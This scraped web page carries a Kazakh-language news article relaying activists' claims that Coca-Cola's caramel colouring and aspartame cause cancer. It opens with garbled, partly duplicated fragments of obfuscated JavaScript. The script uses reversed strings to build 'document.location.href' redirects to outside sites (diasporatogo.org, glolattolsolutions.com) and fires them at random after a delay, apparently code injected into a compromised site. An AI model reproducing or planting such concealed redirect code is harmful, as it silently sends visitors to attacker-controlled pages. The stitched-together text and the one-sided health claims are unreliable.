$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/coca-cola.jpg» height=»108″ width=»103″ />Қарақоңыр түсімен ерекшеленетін «Кока –Кола» дайындауда пайдаланылатын карамель негізіндегі бояғыштар обыр (рак) ауруының дамуына әсер етеді.
Бұл туралы «The Daily Mail» деп аталатын британдық газетте жазылды.
Мұндай мәлімдемені салауатты өмір салты үшін күресіп жүрген американдықтар жасаған. Белсенділер «Коланы» өндіруші-компаниялардың «бұл карамельдің түсі» деп сеніммен айтуына еш негіз жоқ, бұл нағыз алдаудың өзі. Бұл қошқыл түс табиғи емес, ерітілген канцерогендер, дейді Лондондағы «Вестей ФМ»-нің тілшісі Елена Балаева.
«Кока-Коланың» жарнамасына қарасаңыз, кофеин, ванилин, корица, кориандр бәрі шетінен табиғи өнімдер. Бірақ бұл жарнамада ғана, шын мәнінде бұл құрамды өндірушілер «табиғи карамель» деп мақтаныш ететін бояғыш зат жоқ етеді. «Коланың» құрамындағы карамель үй жағдайындағыдай қантты жоғары температурада қыздыру арқылы емес, қант, аммиак және сульфиттің арасында күрделі химиялық реакциялардың әрекеттесуінен алады.Бұл жоғары қысыммен температура жағдайында өтеді. Бұл реакциялардың нәтижесінде алынған бояғыш зат адам үшін өте зиянды.
Вашингтондық табиғи тағамды қолдаушылар,американдық зертханаларда жұмыс істеп жатқан оқымыстылар бұл химиялық құрамның бауыр, өкпе, тамақ қалқаны рагын және ақ қан ауруларын тудыратынын анықтағанын айтып алаңдайды.Және мұндай қауіпті қоспа «Кока-Кола» компаниясы шығаратын бес түрлі өнімнен табылған. Компания өкілдіктері әзірге мұндай айыптауға ләм-мим демей тым-тырыс отыр. Неге қайнатпаға аммиак қолданылмайтын басқа бояғыш заттар қолданбайсыздар? деген сұраққа да жауап қатпайды. Жалпы сарапшылардың зерттеуінше , американдық өндірушілер өнімдеріне 4 түрлі жасанды карамель қолданады, оның екеуінің қайнатпасында аммиак қолданылады.
Алдыңғы қатарлы американдық онкологтар осы аммиак қолданылған қайнатпалар қосылған сыра, кола, соя өндірісіне қарсы. Бұл «Кока-Кола» компаниясының айналасында қозғалып жатқан алғашқы дау емес, бұрынғылардың жалғасы. Бұған дейін осы жылдың өзінде ресейлік тұтынушылар құқығын қорғаушылар сот арқылы «Кока- Кола Лайттың» өнімдерін Ресей аумағында сатуға тыйым салу жөнінде мәселе көтерген болатын. Себеп өнім құрамында адам денсаулығы үшін өте қауіпті болып саналатын қантты алмастыратын аспартамның мөлшерінің көрсетілмеуі. Аспартам адам ағзасына рак ауруына шалдықтыратын формальдегид –канцерогеніне айналатын метил спирті болып түседі.
Бірақ заңгерлердің айтуынша әзірге бұл өнімдердің сатылуына тыйым салына қоймайтын сияқты. Себебі, компания дауға негіз болған этикетканы талапқа сай өзгерте қояды, бұл оның құрамына ешқандай әсер етпейді.
Сондықтан да әрбір тұтынушы өзінің денсаулығына өзі жауапкершілікпен қарағанынан басқа амал жоқ.{jcomments on}
Leave a Reply